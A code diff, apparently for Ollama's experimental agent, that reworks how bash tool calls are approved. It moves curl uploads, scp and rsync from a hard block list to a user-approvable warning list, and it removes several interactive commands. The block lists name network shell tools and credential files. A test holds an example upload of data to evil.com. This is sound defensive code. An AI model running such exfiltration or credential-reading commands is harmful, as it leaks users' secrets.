+cmake --install --component MLX
+go build -tags mlx .
+```
+
+On Linux, use the preset "MLX CUDA 13" or "MLX CUDA 12" to build with CUDA for the default Ollama NVIDIA GPU architectures.
+
+## Image Generation
+
+Based on the experimental MLX backend, we're working on adding image generation support. After running the cmake commands above:
+
+```
+go build -o imagegen ./x/imagegen/cmd/engine
+```
--- a/x/agent/approval.go
+++ b/x/agent/approval.go
@@ -41,7 +41,6 @@ var optionLabels = []string{
 var toolDisplayNames = map[string]string{
 	"bash":       "Bash",
 	"web_search": "Web Search",
-	"web_fetch":  "Web Fetch",
 }

 // ToolDisplayName returns the human-readable display name for a tool.
@@ -71,9 +70,6 @@ var autoAllowCommands = map[string]bool{
 // autoAllowPrefixes are command prefixes that are always allowed.
 // These are read-only or commonly-needed development commands.
 var autoAllowPrefixes = []string{
-	// Git read-only
-	"git status", "git log", "git diff", "git branch", "git show",
-	"git remote -v", "git tag", "git stash list",
 	// Package managers - run scripts
 	"npm run", "npm test", "npm start",
 	"bun run", "bun test",
@@ -92,6 +88,9 @@ var autoAllowPrefixes = []string{
 }

 // denyPatterns are dangerous command patterns that are always blocked.
+// NOTE: Some network patterns (curl POST, scp, rsync) moved to warnPatterns
+// to allow user escalation with explicit approval.
+// These patterns use word boundary matching to avoid false positives (e.g., "nc " won't match "rsync").
 var denyPatterns = []string{
 	// Destructive commands
 	"rm -rf", "rm -fr",
@@ -102,19 +101,8 @@ var denyPatterns = []string{
 	"sudo ", "su ", "doas ",
 	"chmod 777", "chmod -R 777",
 	"chown ", "chgrp ",
-	// Network exfiltration
-	"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
-	"wget --post",
+	// Network tools (raw sockets - still blocked)
 	"nc ", "netcat ",
-	"scp ", "rsync ",
-	// History and credentials
-	"history",
-	".bash_history", ".zsh_history",
-	".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
-	".ssh/config",
-	".aws/credentials", ".aws/config",
-	".gnupg/",
-	"/etc/shadow", "/etc/passwd",
 	// Dangerous patterns
 	":(){ :|:& };:", // fork bomb
 	"chmod +s",      // setuid
@@ -122,11 +110,20 @@ var denyPatterns = []string{
 }

 // denyPathPatterns are file patterns that should never be accessed.
-// These are checked as exact filename matches or path suffixes.
+// These are checked using simple substring matching.
 var denyPathPatterns = []string{
-	".env",
-	".env.local",
-	".env.production",
+	// History files
+	"history",
+	".bash_history", ".zsh_history",
+	// SSH keys and config
+	".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
+	".ssh/config",
+	// Cloud credentials
+	".aws/credentials", ".aws/config",
+	".gnupg/",
+	// System credentials
+	"/etc/shadow", "/etc/passwd",
+	// Secrets files
 	"credentials.json",
 	"secrets.json",
 	"secrets.yaml",
@@ -135,6 +132,25 @@ var denyPathPatterns = []string{
 	".key",
 }

+// warnPatterns are command patterns that require explicit approval with a warning.
+// They are potentially risky but legitimate in some contexts, so unlike denyPatterns
+// they can still be approved. IsWarn matches them as case-insensitive substrings.
+var warnPatterns = []string{
+	// Network uploads via curl/wget (a user may need these for legitimate API testing)
+	"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
+	"wget --post",
+	// File transfer (a user may need these for deployments)
+	"scp ", "rsync ",
+}
+
+// warnPathPatterns are file patterns that warn but still allow user approval (unlike denyPathPatterns).
+// IsWarn reports the first substring match, so specific names must precede the ".env" catch-all.
+var warnPathPatterns = []string{
+	".env.local",
+	".env.production",
+	".env",
+}
+
 // ApprovalManager manages tool execution approvals.
 type ApprovalManager struct {
 	allowlist map[string]bool // exact matches
@@ -177,7 +193,8 @@ func IsDenied(command string) (bool, string) {

 	// Check deny patterns
 	for _, pattern := range denyPatterns {
-		if strings.Contains(commandLower, strings.ToLower(pattern)) {
+		patternLower := strings.ToLower(pattern)
+		if containsWord(commandLower, patternLower) {
 			return true, pattern
 		}
 	}
@@ -192,6 +209,57 @@ func IsDenied(command string) (bool, string) {
 	return false, ""
 }

+// containsWord reports whether pattern occurs in command at a command-word boundary.
+// This lets "nc " match "nc -l 8080" or "ls; nc host" without matching "rsync -avz".
+// The pattern is considered a match if:
+// - It appears at the very start of the command, OR
+// - It directly follows whitespace (space, tab, newline), a shell operator, or a quote
+func containsWord(command, pattern string) bool {
+	// Cheap substring rejection before the boundary checks
+	if !strings.Contains(command, pattern) {
+		return false
+	}
+
+	// A pattern that opens the command is always at a word boundary
+	if strings.HasPrefix(command, pattern) {
+		return true
+	}
+
+	// Tab/newline/CR cover multi-line scripts; quotes cover wrappers like: sh -c "sudo ..."
+	delimiters := []string{" ", "\t", "\n", "\r", "|", ";", "&", "(", "`", "$", "\"", "'"}
+	for _, delim := range delimiters {
+		if strings.Contains(command, delim+pattern) {
+			return true
+		}
+	}
+
+	return false
+}
+
+// IsWarn reports whether a bash command should trigger an approval warning.
+// These commands are risky but can be legitimate, so the user is asked to
+// approve them explicitly instead of having them blocked like deny patterns.
+// Matching is a case-insensitive substring search over warnPatterns first and
+// warnPathPatterns second; the first pattern found is the one reported.
+// Returns true and the matched pattern on a hit, or false and "" when
+// nothing matches.
+func IsWarn(command string) (bool, string) {
+	lowered := strings.ToLower(command)
+
+	// Walk the command patterns, then the path patterns, in declaration order
+	for _, group := range [][]string{warnPatterns, warnPathPatterns} {
+		for _, candidate := range group {
+			// Patterns are lowered too so mixed-case entries such as "curl -X POST" still match
+			if strings.Contains(lowered, strings.ToLower(candidate)) {
+				return true, candidate
+			}
+		}
+	}
+
+	// Nothing matched: no warning needed
+	return false, ""
+}
+
 // FormatDeniedResult returns the tool result message when a command is blocked.
 func FormatDeniedResult(command string, pattern string) string {
 	return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern)
@@ -199,6 +267,7 @@ func FormatDeniedResult(command string, pattern string) string {

 // extractBashPrefix extracts a prefix pattern from a bash command.
 // For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/"
+// For git commands like "git log x/agent/", returns "git log:x/agent/" (includes subcommand)
 // For commands without path args, returns empty string.
 // Paths with ".." traversal that escape the base directory return empty string for security.
 func extractBashPrefix(command string) string {
@@ -220,12 +289,30 @@ func extractBashPrefix(command string) string {
 		"less": true, "more": true, "file": true, "wc": true,
 		"grep": true, "find": true, "tree": true, "stat": true,
 		"sed": true,
+		"git": true, // git commands with path args (e.g., git log x/agent/)
 	}

 	if !safeCommands[baseCmd] {
 		return ""
 	}

+	// For git commands, extract the subcommand for more granular allowlisting
+	var subCmd string
+	if baseCmd == "git" && len(fields) >= 2 {
+		// Git subcommand is the second field (e.g., "log", "status", "diff")
+		// Skip options like "-v" - the first non-option argument is the subcommand
+		for _, arg := range fields[1:] {
+			if !strings.HasPrefix(arg, "-") {
+				subCmd = arg
+				break
+			}
+		}
+		// If no subcommand found (e.g. only flags were given), fall back to the "unknown" placeholder
+		if subCmd == "" {
+			subCmd = "unknown"
+		}
+	}
+
 	// Find the first path-like argument (must contain / or \ or start with .)
 	// First pass: look for clear paths (containing path separators or starting with .)
 	for _, arg := range fields[1:] {
@@ -237,6 +324,10 @@ func extractBashPrefix(command string) string {
 		if isNumeric(arg) {
 			continue
 		}
+		// For git, skip the subcommand itself when looking for paths
+		if baseCmd == "git" && arg == subCmd {
+			continue
+		}
 		// Only process if it looks like a path (contains / or \ or starts with .)
 		if !strings.Contains(arg, "/") && !strings.Contains(arg, "\\") && !strings.HasPrefix(arg, ".") {
 			continue
@@ -278,6 +369,13 @@ func extractBashPrefix(command string) string {
 			dir = path.Dir(cleaned)
 		}

+		// Build prefix with subcommand for git, or just baseCmd for others
+		if baseCmd == "git" {
+			if dir == "." {
+				return fmt.Sprintf("git %s:./", subCmd)
+			}
+			return fmt.Sprintf("git %s:%s/", subCmd, dir)
+		}
 		if dir == "." {
 			return fmt.Sprintf("%s:./", baseCmd)
 		}
@@ -285,6 +383,7 @@ func extractBashPrefix(command string) string {
 	}

 	// Second pass: if no clear path found, use the first non-flag argument as a filename
+	// For git, we still allow ./ prefix even without path args (git status, git stash, etc.)
 	for _, arg := range fields[1:] {
 		if strings.HasPrefix(arg, "-") {
 			continue
@@ -292,6 +391,12 @@ func extractBashPrefix(command string) string {
 		if isNumeric(arg) {
 			continue
 		}
+		// For git, skip the subcommand when checking for path args
+		if baseCmd == "git" && arg == subCmd {
+			// Git commands without path args (git status, git stash, etc.)
+			// Still return a prefix with subcommand and current directory
+			return fmt.Sprintf("git %s:./", subCmd)
+		}
 		// Treat as filename in current dir
 		return fmt.Sprintf("%s:./", baseCmd)
 	}
@@ -495,24 +600,37 @@ func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any)
 	// This prevents buffered input from causing double-press issues
 	flushStdin(fd)

+	// Check if bash command should show warning
+	// Warning is shown for: commands outside cwd, or commands matching warn patterns
 	isWarning := false
 	var warningMsg string
 	var allowlistInfo string
 	if toolName == "bash" {
 		if cmd, ok := args["command"].(string); ok {
+			// Check for outside cwd warning
 			if isCommandOutsideCwd(cmd) {
 				isWarning = true
 				warningMsg = "command targets paths outside project"
 			}
-			if prefix := extractBashPrefix(cmd); prefix != "" {
+			// Check for warn patterns (curl POST, scp, rsync, .env files)
+			if warned, pattern := IsWarn(cmd); warned {
+				isWarning = true
+				warningMsg = fmt.Sprintf("matches warning pattern: %s", pattern)
+			}
+			// Generate allowlist info for display
+			prefix := extractBashPrefix(cmd)
+			if prefix != "" {
+				// Parse prefix format "cmd:path/" into command and directory
 				colonIdx := strings.Index(prefix, ":")
 				if colonIdx != -1 {
 					cmdName := prefix[:colonIdx]
 					dirPath := prefix[colonIdx+1:]
+					// Include "(includes subdirs)" for directories that allow hierarchical matching
+					// ./ is special - it only allows files in current dir, not subdirs
 					if dirPath != "./" {
-						allowlistInfo = fmt.Sprintf("%s in %s directory (includes subdirs)", cmdName, dirPath)
+						allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory (includes subdirs)", cmdName, dirPath)
 					} else {
-						allowlistInfo = fmt.Sprintf("%s in %s directory", cmdName, dirPath)
+						allowlistInfo = fmt.Sprintf("Allow for this session: %s in %s directory", cmdName, dirPath)
 					}
 				}
 			}
@@ -566,16 +684,6 @@ func formatToolDisplay(toolName string, args map[string]any) string {
 		}
 	}

-	// For web fetch, show URL and internet notice
-	if toolName == "web_fetch" {
-		if url, ok := args["url"].(string); ok {
-			sb.WriteString(fmt.Sprintf("Tool: %s\n", displayName))
-			sb.WriteString(fmt.Sprintf("URL: %s\n", url))
-			sb.WriteString("Uses internet via ollama.com")
-			return sb.String()
-		}
-	}
-
 	// Generic display
 	sb.WriteString(fmt.Sprintf("Tool: %s", displayName))
 	if len(args) > 0 {
@@ -604,7 +712,7 @@ type selectorState struct {
 	denyReason     string // deny reason (always visible in box)
 	isWarning      bool   // true if command has warning
 	warningMessage string // dynamic warning message to display
-	allowlistInfo  string // show what will be allowlisted (for "Allow for this session" option)
+	allowlistInfo  string // show what will be allowlisted (for "Always allow" option)
 }

 // runSelector runs the interactive selector and returns the selected index and optional deny reason.
@@ -818,9 +926,11 @@ func renderSelectorBox(state *selectorState) {
 	// Blank line separator
 	fmt.Fprintf(os.Stderr, "\033[K\r\n")

+	// Draw options
 	for i, label := range optionLabels {
-		if i == 2 {
+		if i == 2 { // Deny option with input
 			denyLabel := "3. Deny: "
+			// Show placeholder if empty, actual input if typing
 			inputDisplay := state.denyReason
 			if inputDisplay == "" {
 				inputDisplay = "\033[90m(optional reason)\033[0m"
@@ -831,6 +941,7 @@ func renderSelectorBox(state *selectorState) {
 				fmt.Fprintf(os.Stderr, "  \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
 			}
 		} else {
+			// Show allowlist info beside "Allow for this session" (index 1)
 			displayLabel := label
 			if i == 1 && state.allowlistInfo != "" {
 				displayLabel = fmt.Sprintf("%s  \033[90m%s\033[0m", label, state.allowlistInfo)
@@ -866,8 +977,9 @@ func updateSelectorOptions(state *selectorState) {
 	linesToMove := len(hintLines) - 1 + 1 + len(optionLabels)
 	fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)

+	// Redraw options
 	for i, label := range optionLabels {
-		if i == 2 {
+		if i == 2 { // Deny option
 			denyLabel := "3. Deny: "
 			inputDisplay := state.denyReason
 			if inputDisplay == "" {
@@ -879,6 +991,7 @@ func updateSelectorOptions(state *selectorState) {
 				fmt.Fprintf(os.Stderr, "  \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
 			}
 		} else {
+			// Show allowlist info beside "Allow for this session" (index 1)
 			displayLabel := label
 			if i == 1 && state.allowlistInfo != "" {
 				displayLabel = fmt.Sprintf("%s  \033[90m%s\033[0m", label, state.allowlistInfo)
@@ -1000,11 +1113,11 @@ func FormatApprovalResult(toolName string, args map[string]any, result ApprovalR

 	switch result.Decision {
 	case ApprovalOnce:
-		label = "Approved"
+		label = "approved"
 	case ApprovalAlways:
-		label = "Always allowed"
+		label = "always allowed"
 	case ApprovalDeny:
-		label = "Denied"
+		label = "denied"
 	}

 	// Format based on tool type
@@ -1028,16 +1141,6 @@ func FormatApprovalResult(toolName string, args map[string]any, result ApprovalR
 		}
 	}

-	if toolName == "web_fetch" {
-		if url, ok := args["url"].(string); ok {
-			// Truncate long URLs
-			if len(url) > 50 {
-				url = url[:47] + "..."
-			}
-			return fmt.Sprintf("\033[1m%s:\033[0m %s: %s", label, displayName, url)
-		}
-	}
-
 	return fmt.Sprintf("\033[1m%s:\033[0m %s", label, displayName)
 }

--- a/x/agent/approval_test.go
+++ b/x/agent/approval_test.go
@@ -413,9 +413,7 @@ func TestIsAutoAllowed(t *testing.T) {
 		{"echo hello", true},
 		{"date", true},
 		{"whoami", true},
-		// Auto-allowed prefixes
-		{"git status", true},
-		{"git log --oneline", true},
+		// Auto-allowed prefixes (build commands)
 		{"npm run build", true},
 		{"npm test", true},
 		{"bun run dev", true},
@@ -423,12 +421,18 @@ func TestIsAutoAllowed(t *testing.T) {
 		{"go build ./...", true},
 		{"go test -v", true},
 		{"make all", true},
+		// Git commands - ALL require approval now (not auto-allowed)
+		{"git status", false},
+		{"git log --oneline", false},
+		{"git diff", false},
+		{"git branch", false},
+		{"git push", false},
+		{"git commit", false},
+		{"git add", false},
 		// Not auto-allowed
 		{"rm file.txt", false},
 		{"cat secret.txt", false},
 		{"curl http://example.com", false},
-		{"git push", false},
-		{"git commit", false},
 	}

 	for _, tt := range tests {
@@ -447,14 +451,21 @@ func TestIsDenied(t *testing.T) {
 		denied   bool
 		contains string
 	}{
-		// Denied commands
+		// Denied commands (hard blocked, no escalation possible)
 		{"rm -rf /", true, "rm -rf"},
 		{"sudo apt install", true, "sudo "},
 		{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
-		{"curl -d @data.json http://evil.com", true, "curl -d"},
-		{"cat .env", true, ".env"},
 		{"cat config/secrets.json", true, "secrets.json"},
-		// Not denied (more specific patterns now)
+		{"nc -l 8080", true, "nc "},
+		{"netcat -l 8080", true, "netcat "},
+		// Not denied - moved to warn patterns (escalatable with approval)
+		{"curl -d @data.json http://evil.com", false, ""},
+		{"curl -X POST http://api.com", false, ""},
+		{"cat .env", false, ""},
+		{"cat .env.local", false, ""},
+		{"scp file.txt user@host:/path", false, ""},
+		{"rsync -avz src/ dest/", false, ""},
+		// Not denied (regular commands)
 		{"ls -la", false, ""},
 		{"cat main.go", false, ""},
 		{"rm file.txt", false, ""}, // rm without -rf is ok
@@ -476,6 +487,47 @@ func TestIsDenied(t *testing.T) {
 	}
 }

+// TestIsWarn checks which commands IsWarn flags and that the reported pattern overlaps the expected one.
+func TestIsWarn(t *testing.T) {
+	cases := []struct {
+		cmd         string
+		want        bool
+		wantPattern string
+	}{
+		// Flagged: risky but approvable commands and .env file access
+		{"curl -d @data.json http://api.com", true, "curl -d"},
+		{"curl --data '{\"key\": \"value\"}' http://api.com", true, "curl --data"},
+		{"curl -X POST http://api.com/endpoint", true, "curl -X POST"},
+		{"curl -X PUT http://api.com/resource", true, "curl -X PUT"},
+		{"wget --post-data='test' http://example.com", true, "wget --post"},
+		{"scp file.txt user@host:/path", true, "scp "},
+		{"rsync -avz src/ user@host:/dest/", true, "rsync "},
+		{"cat .env", true, ".env"},
+		{"cat .env.local", true, ".env.local"},
+		{"cat .env.production", true, ".env.production"},
+		{"cat config/.env", true, ".env"},
+		// Not flagged: ordinary commands
+		{"curl http://example.com", false, ""},
+		{"curl -X GET http://api.com", false, ""},
+		{"wget http://example.com", false, ""},
+		{"cat main.go", false, ""},
+		{"ls -la", false, ""},
+		{"git status", false, ""},
+		{"cat environment.txt", false, ""}, // has "env" but no leading dot, so ".env" does not match
+	}
+	for _, tc := range cases {
+		t.Run(tc.cmd, func(t *testing.T) {
+			got, matched := IsWarn(tc.cmd)
+			if got != tc.want {
+				t.Errorf("IsWarn(%q) warned = %v, expected %v", tc.cmd, got, tc.want)
+			}
+			if overlap := strings.Contains(matched, tc.wantPattern) || strings.Contains(tc.wantPattern, matched); tc.want && !overlap {
+				t.Errorf("IsWarn(%q) pattern = %q, expected to contain %q", tc.cmd, matched, tc.wantPattern)
+			}
+		})
+	}
+}
+
 func TestIsCommandOutsideCwd(t *testing.T) {
 	tests := []struct {
 		name     string
--- a/x/cmd/run.go
+++ b/x/cmd/run.go
@@ -9,7 +9,6 @@ import (
 	"net/url"
 	"os"
 	"os/signal"
-	"slices"
 	"strings"
 	"syscall"
 	"time"
@@ -131,7 +130,6 @@ type RunOptions struct {
 	KeepAlive    *api.Duration
 	Think        *api.ThinkValue
 	HideThinking bool
-	Verbose      bool

 	// Agent fields (managed externally for session persistence)
 	Tools    *tools.Registry
@@ -180,7 +178,6 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
 	var thinkTagClosed bool = false
 	var pendingToolCalls []api.ToolCall
 	var consecutiveErrors int // Track consecutive 500 errors for retry limit
-	var latest api.ChatResponse

 	role := "assistant"
 	messages := opts.Messages
@@ -190,7 +187,6 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
 			p.StopAndClear()
 		}

-		latest = response
 		role = response.Message.Role
 		if response.Message.Thinking != "" && !opts.HideThinking {
 			if !thinkTagOpened {
@@ -368,11 +364,10 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
 					}

 					// Check if command is auto-allowed (safe command)
-					// TODO(parthsareen): re-enable with tighter scoped allowlist
-					// if agent.IsAutoAllowed(cmd) {
-					// 	fmt.Fprintf(os.Stderr, "\033[1mauto-allowed:\033[0m %s\n", formatToolShort(toolName, args))
-					// 	skipApproval = true
-					// }
+					if agent.IsAutoAllowed(cmd) {
+						fmt.Fprintf(os.Stderr, "\033[1mauto-allowed:\033[0m %s\n", formatToolShort(toolName, args))
+						skipApproval = true
+					}
 				}
 			}

@@ -487,10 +482,6 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
 		fmt.Println()
 	}

-	if opts.Verbose {
-		latest.Summary()
-	}
-
 	return &api.Message{Role: role, Thinking: thinkingContent.String(), Content: fullResponse.String()}, nil
 }

@@ -642,13 +633,12 @@ func checkModelCapabilities(ctx context.Context, modelName string) (supportsTool
 // GenerateInteractive runs an interactive agent session.
 // This is called from cmd.go when --experimental flag is set.
 // If yoloMode is true, all tool approvals are skipped.
-// If enableWebsearch is true, the web search tool is registered.
-func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration, yoloMode bool, enableWebsearch bool) error {
+func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration, yoloMode bool) error {
 	scanner, err := readline.New(readline.Prompt{
 		Prompt:         ">>> ",
 		AltPrompt:      "... ",
 		Placeholder:    "Send a message (/? for help)",
-		AltPlaceholder: "Press Enter to send",
+		AltPlaceholder: `Use """ to end multi-line input`,
 	})
 	if err != nil {
 		return err
@@ -668,28 +658,14 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 	var toolRegistry *tools.Registry
 	if supportsTools {
 		toolRegistry = tools.DefaultRegistry()
-
-		// Register web search and web fetch tools if enabled via flag
-		if enableWebsearch {
-			toolRegistry.RegisterWebSearch()
-			toolRegistry.RegisterWebFetch()
+		if toolRegistry.Count() > 0 {
+			fmt.Fprintf(os.Stderr, "\033[90mtools available: %s\033[0m\n", strings.Join(toolRegistry.Names(), ", "))
 		}
-
-		if toolRegistry.Has("bash") {
-			fmt.Fprintln(os.Stderr)
-			fmt.Fprintln(os.Stderr, "This experimental version of Ollama has the \033[1mbash\033[0m tool enabled.")
-			fmt.Fprintln(os.Stderr, "Models can read files on your computer, or run commands (after you allow them).")
-			fmt.Fprintln(os.Stderr)
-		}
-
-		if toolRegistry.Has("web_search") || toolRegistry.Has("web_fetch") {
-			fmt.Fprintln(os.Stderr, "The \033[1mWeb Search\033[0m and \033[1mWeb Fetch\033[0m tools are enabled. Models can search and fetch web content via ollama.com.")
-			fmt.Fprintln(os.Stderr)
-		}
-
 		if yoloMode {
 			fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m yolo mode - all tool approvals will be skipped\n")
 		}
+	} else {
+		fmt.Fprintf(os.Stderr, "\033[1mnote:\033[0m model does not support tools - running in chat-only mode\n")
 	}

 	// Create approval manager for session
@@ -697,8 +673,6 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op

 	var messages []api.Message
 	var sb strings.Builder
-	var format string
-	var system string

 	for {
 		line, err := scanner.Readline()
@@ -710,7 +684,6 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 			if line == "" {
 				fmt.Println("\nUse Ctrl + d or /bye to exit.")
 			}
-			scanner.Prompt.UseAlt = false
 			sb.Reset()
 			continue
 		case err != nil:
@@ -730,10 +703,6 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 			continue
 		case strings.HasPrefix(line, "/help"), strings.HasPrefix(line, "/?"):
 			fmt.Fprintln(os.Stderr, "Available Commands:")
-			fmt.Fprintln(os.Stderr, "  /set            Set session variables")
-			fmt.Fprintln(os.Stderr, "  /show           Show model information")
-			fmt.Fprintln(os.Stderr, "  /load           Load a different model")
-			fmt.Fprintln(os.Stderr, "  /save           Save session as a model")
 			fmt.Fprintln(os.Stderr, "  /tools          Show available tools and approvals")
 			fmt.Fprintln(os.Stderr, "  /clear          Clear session context and approvals")
 			fmt.Fprintln(os.Stderr, "  /bye            Exit")
@@ -743,280 +712,6 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 			fmt.Fprintln(os.Stderr, "  Ctrl+O          Expand last tool output")
 			fmt.Fprintln(os.Stderr, "")
 			continue
-		case strings.HasPrefix(line, "/set"):
-			args := strings.Fields(line)
-			if len(args) > 1 {
-				switch args[1] {
-				case "history":
-					scanner.HistoryEnable()
-				case "nohistory":
-					scanner.HistoryDisable()
-				case "wordwrap":
-					wordWrap = true
-					fmt.Println("Set 'wordwrap' mode.")
-				case "nowordwrap":
-					wordWrap = false
-					fmt.Println("Set 'nowordwrap' mode.")
-				case "verbose":
-					if err := cmd.Flags().Set("verbose", "true"); err != nil {
-						return err
-					}
-					fmt.Println("Set 'verbose' mode.")
-				case "quiet":
-					if err := cmd.Flags().Set("verbose", "false"); err != nil {
-						return err
-					}
-					fmt.Println("Set 'quiet' mode.")
-				case "think":
-					thinkValue := api.ThinkValue{Value: true}
-					var maybeLevel string
-					if len(args) > 2 {
-						maybeLevel = args[2]
-					}
-					if maybeLevel != "" {
-						thinkValue.Value = maybeLevel
-					}
-					think = &thinkValue
-					// Check if model supports thinking
-					if client, err := api.ClientFromEnvironment(); err == nil {
-						if resp, err := client.Show(cmd.Context(), &api.ShowRequest{Model: modelName}); err == nil {
-							if !slices.Contains(resp.Capabilities, model.CapabilityThinking) {
-								fmt.Fprintf(os.Stderr, "warning: model %q does not support thinking output\n", modelName)
-							}
-						}
-					}
-					if maybeLevel != "" {
-						fmt.Printf("Set 'think' mode to '%s'.\n", maybeLevel)
-					} else {
-						fmt.Println("Set 'think' mode.")
-					}
-				case "nothink":
-					think = &api.ThinkValue{Value: false}
-					// Check if model supports thinking
-					if client, err := api.ClientFromEnvironment(); err == nil {
-						if resp, err := client.Show(cmd.Context(), &api.ShowRequest{Model: modelName}); err == nil {
-							if !slices.Contains(resp.Capabilities, model.CapabilityThinking) {
-								fmt.Fprintf(os.Stderr, "warning: model %q does not support thinking output\n", modelName)
-							}
-						}
-					}
-					fmt.Println("Set 'nothink' mode.")
-				case "format":
-					if len(args) < 3 || args[2] != "json" {
-						fmt.Println("Invalid or missing format. For 'json' mode use '/set format json'")
-					} else {
-						format = args[2]
-						fmt.Printf("Set format to '%s' mode.\n", args[2])
-					}
-				case "noformat":
-					format = ""
-					fmt.Println("Disabled format.")
-				case "parameter":
-					if len(args) < 4 {
-						fmt.Println("Usage: /set parameter <name> <value>")
-						continue
-					}
-					params := args[3:]
-					fp, err := api.FormatParams(map[string][]string{args[2]: params})
-					if err != nil {
-						fmt.Printf("Couldn't set parameter: %q\n", err)
-						continue
-					}
-					fmt.Printf("Set parameter '%s' to '%s'\n", args[2], strings.Join(params, ", "))
-					options[args[2]] = fp[args[2]]
-				case "system":
-					if len(args) < 3 {
-						fmt.Println("Usage: /set system <message>")
-						continue
-					}
-
-					system = strings.Join(args[2:], " ")
-					newMessage := api.Message{Role: "system", Content: system}
-					if len(messages) > 0 && messages[len(messages)-1].Role == "system" {
-						messages[len(messages)-1] = newMessage
-					} else {
-						messages = append(messages, newMessage)
-					}
-					fmt.Println("Set system message.")
-					continue
-				default:
-					fmt.Printf("Unknown command '/set %s'. Type /? for help\n", args[1])
-				}
-			} else {
-				fmt.Println("Usage: /set <parameter|system|history|format|wordwrap|think|verbose> [value]")
-			}
-			continue
-		case strings.HasPrefix(line, "/show"):
-			args := strings.Fields(line)
-			if len(args) > 1 {
-				client, err := api.ClientFromEnvironment()
-				if err != nil {
-					fmt.Println("error: couldn't connect to ollama server")
-					continue
-				}
-				req := &api.ShowRequest{
-					Name:    modelName,
-					Options: options,
-				}
-				resp, err := client.Show(cmd.Context(), req)
-				if err != nil {
-					fmt.Println("error: couldn't get model")
-					continue
-				}
-
-				switch args[1] {
-				case "info":
-					fmt.Fprintf(os.Stderr, "  Model\n")
-					fmt.Fprintf(os.Stderr, "    %-16s %s\n", "Name", modelName)
-					if resp.Details.Family != "" {
-						fmt.Fprintf(os.Stderr, "    %-16s %s\n", "Family", resp.Details.Family)
-					}
-					if resp.Details.ParameterSize != "" {
-						fmt.Fprintf(os.Stderr, "    %-16s %s\n", "Parameter Size", resp.Details.ParameterSize)
-					}
-					if resp.Details.QuantizationLevel != "" {
-						fmt.Fprintf(os.Stderr, "    %-16s %s\n", "Quantization", resp.Details.QuantizationLevel)
-					}
-					if len(resp.Capabilities) > 0 {
-						caps := make([]string, len(resp.Capabilities))
-						for i, c := range resp.Capabilities {
-							caps[i] = string(c)
-						}
-						fmt.Fprintf(os.Stderr, "    %-16s %s\n", "Capabilities", strings.Join(caps, ", "))
-					}
-					fmt.Fprintln(os.Stderr)
-				case "license":
-					if resp.License == "" {
-						fmt.Println("No license was specified for this model.")
-					} else {
-						fmt.Println(resp.License)
-					}
-				case "modelfile":
-					fmt.Println(resp.Modelfile)
-				case "parameters":
-					fmt.Println("Model defined parameters:")
-					if resp.Parameters == "" {
-						fmt.Println("  No additional parameters were specified.")
-					} else {
-						for _, l := range strings.Split(resp.Parameters, "\n") {
-							fmt.Printf("  %s\n", l)
-						}
-					}
-					if len(options) > 0 {
-						fmt.Println("\nUser defined parameters:")
-						for k, v := range options {
-							fmt.Printf("  %-30s %v\n", k, v)
-						}
-					}
-				case "system":
-					switch {
-					case system != "":
-						fmt.Println(system + "\n")
-					case resp.System != "":
-						fmt.Println(resp.System + "\n")
-					default:
-						fmt.Println("No system message was specified for this model.")
-					}
-				case "template":
-					if resp.Template != "" {
-						fmt.Println(resp.Template)
-					} else {
-						fmt.Println("No prompt template was specified for this model.")
-					}
-				default:
-					fmt.Printf("Unknown command '/show %s'. Type /? for help\n", args[1])
-				}
-			} else {
-				fmt.Println("Usage: /show <info|license|modelfile|parameters|system|template>")
-			}
-			continue
-		case strings.HasPrefix(line, "/load"):
-			args := strings.Fields(line)
-			if len(args) != 2 {
-				fmt.Println("Usage: /load <modelname>")
-				continue
-			}
-			newModelName := args[1]
-			fmt.Printf("Loading model '%s'\n", newModelName)
-
-			// Create progress spinner
-			p := progress.NewProgress(os.Stderr)
-			spinner := progress.NewSpinner("")
-			p.Add("", spinner)
-
-			// Get client
-			client, err := api.ClientFromEnvironment()
-			if err != nil {
-				p.StopAndClear()
-				fmt.Println("error: couldn't connect to ollama server")
-				continue
-			}
-
-			// Check if model exists and get its info
-			info, err := client.Show(cmd.Context(), &api.ShowRequest{Model: newModelName})
-			if err != nil {
-				p.StopAndClear()
-				if strings.Contains(err.Error(), "not found") {
-					fmt.Printf("Couldn't find model '%s'\n", newModelName)
-				} else {
-					fmt.Printf("error: %v\n", err)
-				}
-				continue
-			}
-
-			// For cloud models, no need to preload
-			if info.RemoteHost == "" {
-				// Preload the model by sending an empty generate request
-				req := &api.GenerateRequest{
-					Model: newModelName,
-					Think: think,
-				}
-				err = client.Generate(cmd.Context(), req, func(r api.GenerateResponse) error {
-					return nil
-				})
-				if err != nil {
-					p.StopAndClear()
-					if strings.Contains(err.Error(), "not found") {
-						fmt.Printf("Couldn't find model '%s'\n", newModelName)
-					} else if strings.Contains(err.Error(), "does not support thinking") {
-						fmt.Printf("error: %v\n", err)
